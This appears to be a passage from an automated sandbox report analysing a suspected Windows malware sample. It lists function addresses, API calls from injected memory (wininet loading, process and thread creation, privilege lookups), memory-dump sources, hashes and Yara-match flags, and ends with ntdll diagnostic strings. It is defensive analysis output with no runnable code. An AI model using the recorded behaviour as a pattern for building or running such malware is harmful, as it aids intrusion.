                                                                                                                                                    • Opcode Fuzzy Hash: 18a1f5e7b16570c2505c94e4720c5708e3c2e865e1daa00fcd8749c6a33e06cc
                                                                                                                                                    • Instruction Fuzzy Hash: 509002713111A803D110A1599504756040597D5241F51C825A0815558D87D588A17162
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 03109650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 4e2b5d62a36abe9536a74657c2a3608d28101f3e9c7e2742c0148cb0b0155071
                                                                                                                                                    • Instruction ID: b59d79c506a8e7d492cfd7fad18bc9907c1a186271b5e81add9e869e286e6f17
                                                                                                                                                    • Opcode Fuzzy Hash: 4e2b5d62a36abe9536a74657c2a3608d28101f3e9c7e2742c0148cb0b0155071
                                                                                                                                                    • Instruction Fuzzy Hash: 379002712050AC43D140B1595504B96041597D4345F51C425A0055694D97658D65B6A1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 03109660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: b6d4a2711a8e2d77707e44090c4828bd9d5ed2a0ed3b371c4a606700d8d95a8c
                                                                                                                                                    • Instruction ID: c811b165e3711aaa8923090a62907cd6bc884447e0db9ea8cf3dbf0e3381802a
                                                                                                                                                    • Opcode Fuzzy Hash: b6d4a2711a8e2d77707e44090c4828bd9d5ed2a0ed3b371c4a606700d8d95a8c
                                                                                                                                                    • Instruction Fuzzy Hash: 9590027120106C03D180B159550479A040597D5341F91C429A0016654DCB558A6977E1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 031096D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: eb4f71922f0be98d413bf29f3bcc7a6ed47b6a451cb732249f675e2b1bbeadf7
                                                                                                                                                    • Instruction ID: ea5f6947a445187af664db6e6c2822b8b887419d9439619b59889a2a3166c081
                                                                                                                                                    • Opcode Fuzzy Hash: eb4f71922f0be98d413bf29f3bcc7a6ed47b6a451cb732249f675e2b1bbeadf7
                                                                                                                                                    • Instruction Fuzzy Hash: 0590027120106C43D100A1595504B96040597E4341F51C42AA0115654D8755C8617561
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 031096E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: a7313d8d14001a79fc394d9420a281ec8afaad8d59285599095f881186be84d2
                                                                                                                                                    • Instruction ID: 9ff625c01870becc6a86b6c33d865330cff343b2df347b9dd364258712f4b659
                                                                                                                                                    • Opcode Fuzzy Hash: a7313d8d14001a79fc394d9420a281ec8afaad8d59285599095f881186be84d2
                                                                                                                                                    • Instruction Fuzzy Hash: 599002712010EC03D110A159950479A040597D4341F55C825A4415658D87D588A17161
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 03109540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 1c526123b5298b44befcdb2a59d6f1543cace97380833a79050f9e4c9c7842e4
                                                                                                                                                    • Instruction ID: 658beab366a3831ce0fb222f595c5a45acc0165d848db8b73bbd7569f47d6549
                                                                                                                                                    • Opcode Fuzzy Hash: 1c526123b5298b44befcdb2a59d6f1543cace97380833a79050f9e4c9c7842e4
                                                                                                                                                    • Instruction Fuzzy Hash: 3C900475311074030105F55D17047570447D7DD3D1351C435F1007550CD771CC717171
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 031095D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: df70f67c637d5a73d674de98cfd2f40ffcee462da8cf7df597af1e1f77b68b01
                                                                                                                                                    • Instruction ID: f4f6da4745635297b8574031175ddb057b50ad381fd28e8530f0182e41415e55
                                                                                                                                                    • Opcode Fuzzy Hash: df70f67c637d5a73d674de98cfd2f40ffcee462da8cf7df597af1e1f77b68b01
                                                                                                                                                    • Instruction Fuzzy Hash: 869002A1202064034105B1595514766440A97E4241B51C435E1005590DC76588A17165
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00546EF0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • Sleep.KERNELBASE(000007D0), ref: 00546F98
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.483125240.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Sleep
                                                                                                                                                    • String ID: net.dll$wininet.dll
                                                                                                                                                    • API String ID: 3472027048-1269752229
                                                                                                                                                    • Opcode ID: b50f98344ab47ed974b2589213e9cd93943e64bbfbf8dcd2169a33c92deb350a
                                                                                                                                                    • Instruction ID: ea3d385229220765eb6976325ae84811a75b1e9bb72178e2f665602cb0184d9c
                                                                                                                                                    • Opcode Fuzzy Hash: b50f98344ab47ed974b2589213e9cd93943e64bbfbf8dcd2169a33c92deb350a
                                                                                                                                                    • Instruction Fuzzy Hash: 883190B1602705BBC725DF68D8A5FA7BBF8BB88704F00841DF65A5B241D730B949CBA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00546EE6, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 82sleepCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • Sleep.KERNELBASE(000007D0), ref: 00546F98
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.483125240.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Sleep
                                                                                                                                                    • String ID: net.dll$wininet.dll
                                                                                                                                                    • API String ID: 3472027048-1269752229
                                                                                                                                                    • Opcode ID: 3f3c99e8226f21f7446f1c4984baf9ba55f6e811e72fc3b5436eb5a45b0ca351
                                                                                                                                                    • Instruction ID: f5cfc2a220ba72106398c4958bec2ee2122eb2a564dbd6ae0a0daaa8b3d122d2
                                                                                                                                                    • Opcode Fuzzy Hash: 3f3c99e8226f21f7446f1c4984baf9ba55f6e811e72fc3b5436eb5a45b0ca351
                                                                                                                                                    • Instruction Fuzzy Hash: 6521D2B1501705BBC711DF64D8A5FA7BBF8FB88708F10802DF619AB245D370A845CBA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 005484D6, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00533B93), ref: 0054850D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.483125240.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FreeHeap
                                                                                                                                                    • String ID: .z`
                                                                                                                                                    • API String ID: 3298025750-1441809116
                                                                                                                                                    • Opcode ID: dccce524b708be3fed1236a0f46d8464c42a437cede0284a055dd8ccafced679
                                                                                                                                                    • Instruction ID: d5b741eaddbf4f4b48dee8695378214b386b840018074f8fd3f1a715a56eca0a
                                                                                                                                                    • Opcode Fuzzy Hash: dccce524b708be3fed1236a0f46d8464c42a437cede0284a055dd8ccafced679
                                                                                                                                                    • Instruction Fuzzy Hash: 7AE092B16002046FD714DF54DC49EE77BACEF98350F01855AFD48A7291C631ED01CAA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 005484E0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00533B93), ref: 0054850D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.483125240.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FreeHeap
                                                                                                                                                    • String ID: .z`
                                                                                                                                                    • API String ID: 3298025750-1441809116
                                                                                                                                                    • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                                                    • Instruction ID: 4960a4f3e7994987e262799cb62fb8661d1b1d07be734aa8da9a1b5922c2bb37
                                                                                                                                                    • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                                                    • Instruction Fuzzy Hash: 1EE04FB12002086BD714EF59DC49EE777ACEF88750F014554FD0857241C630F910CAF0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 005484A0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • RtlAllocateHeap.NTDLL(&5T,?,00543C9F,00543C9F,?,00543526,?,?,?,?,?,00000000,00000000,?), ref: 005484CD
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.483125240.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                    • String ID: &5T
                                                                                                                                                    • API String ID: 1279760036-230077467
                                                                                                                                                    • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                                                    • Instruction ID: f43756b1bd7f2a038dc5a4571d59494c3dc9fe468616c7476df3dc51a9cc8f08
                                                                                                                                                    • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                                                    • Instruction Fuzzy Hash: F0E012B1200208ABDB14EF99DC45EAB77ACAF88754F118558BA085B282CA30F9108AB0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00537270, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 005372CA
                                                                                                                                                    • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 005372EB
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.483125240.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessagePostThread
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1836367815-0
                                                                                                                                                    • Opcode ID: f787fd5115f45e17e8f96a40551e57a19faf030edf4e6bc80d94188a7898c0a9
                                                                                                                                                    • Instruction ID: 379b56d7e8f70be060f4c7da5f87d07c982b84f1ade5dbe572384c36e1dd7b0a
                                                                                                                                                    • Opcode Fuzzy Hash: f787fd5115f45e17e8f96a40551e57a19faf030edf4e6bc80d94188a7898c0a9
                                                                                                                                                    • Instruction Fuzzy Hash: 5C01A271E8022977F720A6949C47FFF7B6C6B44B51F150118FF04BA1C2E6D46A0686F6
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00539B30, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00539BA2
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.483125240.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Load
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2234796835-0
                                                                                                                                                    • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                                                                    • Instruction ID: 5e80bcd970e4520416930599cbdc011fa7ef76ffeaa1d058b460f8898e922a01
                                                                                                                                                    • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                                                                    • Instruction Fuzzy Hash: 980152B5D4010EA7DB10DBA4DC46FDEB778AB54308F004194E90897141F671EB04C791
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00548550, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 005485A4
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.483125240.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateInternalProcess
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2186235152-0
                                                                                                                                                    • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                                                    • Instruction ID: 3c08e81e21cfa42f27779152ab50c9b7d9fbae959595dd3fb5b1ad78f918410f
                                                                                                                                                    • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                                                    • Instruction Fuzzy Hash: C301AFB2210108ABCB54DF89DC80EEB77ADAF8C754F158258BA0D97241C630E851CBA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00547020, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0053CCE0,?,?), ref: 0054705C
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.483125240.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateThread
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2422867632-0
                                                                                                                                                    • Opcode ID: 6d34c6e598135bf535da216d5527c321fb023720bd5cf6a1c6f715cbcdd2cb36
                                                                                                                                                    • Instruction ID: 7e5dd5181994c6244b5921d45c0ac6ec1584d295874cb598ca45a7e5631df547
                                                                                                                                                    • Opcode Fuzzy Hash: 6d34c6e598135bf535da216d5527c321fb023720bd5cf6a1c6f715cbcdd2cb36
                                                                                                                                                    • Instruction Fuzzy Hash: B1E06D333813043AE3306599AC02FE7B79C9B95B24F140026FA0DEB2C1D595F80142A8
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00547013, Relevance: 1.5, APIs: 1, Instructions: 35threadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0053CCE0,?,?), ref: 0054705C
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.483125240.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateThread
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2422867632-0
                                                                                                                                                    • Opcode ID: bde2dba54f36727ef8e33968728799726f03a8b4a2601cf52a5ba53abfb6d63d
                                                                                                                                                    • Instruction ID: 1e380d51ce20d264641a0964f51f44d99f052bd17dcd73a1e8cf575861e9694b
                                                                                                                                                    • Opcode Fuzzy Hash: bde2dba54f36727ef8e33968728799726f03a8b4a2601cf52a5ba53abfb6d63d
                                                                                                                                                    • Instruction Fuzzy Hash: 8AF0E5723803113AE3316A189C03FE7B7A89B94B14F10002DFA09EB2C1D6A5F9028AE5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00548631, Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,0053CFB2,0053CFB2,?,00000000,?,?), ref: 00548670
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.483125240.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LookupPrivilegeValue
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3899507212-0
                                                                                                                                                    • Opcode ID: 4aad89f2bbf3fa821d15d92a3386be2789aec638474b835987b58e6d23e5dadd
                                                                                                                                                    • Instruction ID: 686bd5ffd44d0ae4f6edbc27c7662e2a5b12974610681c3e08833d2b4356cdaa
                                                                                                                                                    • Opcode Fuzzy Hash: 4aad89f2bbf3fa821d15d92a3386be2789aec638474b835987b58e6d23e5dadd
                                                                                                                                                    • Instruction Fuzzy Hash: 1CF0A0B12042516BD715EF54DC84EDB7F68EF85614F04849EFC481B142C630A904CBA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00548640, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,0053CFB2,0053CFB2,?,00000000,?,?), ref: 00548670
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.483125240.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LookupPrivilegeValue
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3899507212-0
                                                                                                                                                    • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                                                    • Instruction ID: 6647b726f872d5371692e8e837272f3b9b291ec0e3486e7bb10059f68216f3c8
                                                                                                                                                    • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                                                    • Instruction Fuzzy Hash: D9E01AB16002086BDB10EF49DC85EEB37ADAF88750F018154BA0857241C930E8108BF5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0053D417, Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SetErrorMode.KERNELBASE(00008003,?,?,00537C73,?), ref: 0053D44B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.483125240.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorMode
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2340568224-0
                                                                                                                                                    • Opcode ID: 570aa9b7f25c7a101b98339d1852a5b7dfcf9b07af026fc8928a6683dccab197
                                                                                                                                                    • Instruction ID: fc3d21f64de9e79790705fad9afa9623cc302b64f869ee2f8221bb752ffab60a
                                                                                                                                                    • Opcode Fuzzy Hash: 570aa9b7f25c7a101b98339d1852a5b7dfcf9b07af026fc8928a6683dccab197
                                                                                                                                                    • Instruction Fuzzy Hash: 35E08C35694204ABE714AFA0DC47FA533A8AB69B14F254468F9889A2C3EA65E4028221
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0053D420, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SetErrorMode.KERNELBASE(00008003,?,?,00537C73,?), ref: 0053D44B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.483125240.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorMode
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2340568224-0
                                                                                                                                                    • Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                                                                                                    • Instruction ID: 8f88a83b42008964fa1f4fbaf7ce91be688f6f0cd82853a66f23bc71823c6c4b
                                                                                                                                                    • Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                                                                                                    • Instruction Fuzzy Hash: 2BD05E717503042AEA10BAA49C07F66779C6B94B04F494064F948962C3E964E5104161
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0310967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: ce29798f9ed8a5c16e8e9da89142416122be1f4c0bb98faede025e37dc0dc37a
                                                                                                                                                    • Instruction ID: 117efa5d6c4d365cab377ef7ae3a528b987a865819553b29937859cd508d84cc
                                                                                                                                                    • Opcode Fuzzy Hash: ce29798f9ed8a5c16e8e9da89142416122be1f4c0bb98faede025e37dc0dc37a
                                                                                                                                                    • Instruction Fuzzy Hash: 44B09BB19014D5C7D611D760570872B7D0477D4741F16C565D1020645B4778C091F5B5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Non-executed Functions

                                                                                                                                                    Function 0317B260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    • This failed because of error %Ix., xrefs: 0317B446
                                                                                                                                                    • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0317B38F
                                                                                                                                                    • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0317B53F
                                                                                                                                                    • *** enter .cxr %p for the context, xrefs: 0317B50D
                                                                                                                                                    • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0317B314
                                                                                                                                                    • read from, xrefs: 0317B4AD, 0317B4B2
                                                                                                                                                    • *** An Access Violation occurred in %ws:%s, xrefs: 0317B48F
                                                                                                                                                    • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0317B2DC
                                                                                                                                                    • The instruction at %p tried to %s , xrefs: 0317B4B6
                                                                                                                                                    • The instruction at %p referenced memory at %p., xrefs: 0317B432
                                                                                                                                                    • The critical section is owned by thread %p., xrefs: 0317B3B9
                                                                                                                                                    • a NULL pointer, xrefs: 0317B4E0
                                                                                                                                                    • *** enter .exr %p for the exception record, xrefs: 0317B4F1
                                                                                                                                                    • an invalid address, %p, xrefs: 0317B4CF
                                                                                                                                                    • The resource is owned shared by %d threads, xrefs: 0317B37E
                                                                                                                                                    • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0317B323
                                                                                                                                                    • *** Inpage error in %ws:%s, xrefs: 0317B418
                                                                                                                                                    • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0317B305
                                                                                                                                                    • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0317B2F3
                                                                                                                                                    • Go determine why that thread has not released the critical section., xrefs: 0317B3C5
                                                                                                                                                    • write to, xrefs: 0317B4A6
                                                                                                                                                    • *** Resource timeout (%p) in %ws:%s, xrefs: 0317B352
                                                                                                                                                    • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0317B3D6
                                                                                                                                                    • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0317B484
                                                                                                                                                    • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0317B47D
                                                                                                                                                    • The resource is owned exclusively by thread %p, xrefs: 0317B374
                                                                                                                                                    • <unknown>, xrefs: 0317B27E, 0317B2D1, 0317B350, 0317B399, 0317B417, 0317B48E
